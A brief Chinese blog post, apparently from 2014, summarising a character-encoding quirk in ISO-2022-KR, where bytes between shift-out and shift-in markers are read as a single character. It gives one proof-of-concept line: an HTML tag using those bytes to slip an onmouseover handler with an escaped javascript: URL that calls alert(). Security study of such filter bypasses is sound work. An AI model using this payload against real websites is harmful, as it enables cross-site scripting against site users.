wuliuqiii

[总结] 字符集编码

[ISO-2022-KR].在这个字符集当中存在一种缺陷。就是会把以开头结尾的一串字符看作是2 bytes也就是一个字符。

利用:

<h1 a=&#x0E;>  &#x0F;onmouseover=location='jav\x41script\x3Aalert\x28&quot;Mxx&quot;\x29' >xxx

 

posted on 2014-01-06 22:40  wuliuqiii  阅读(68)  评论(0)    收藏  举报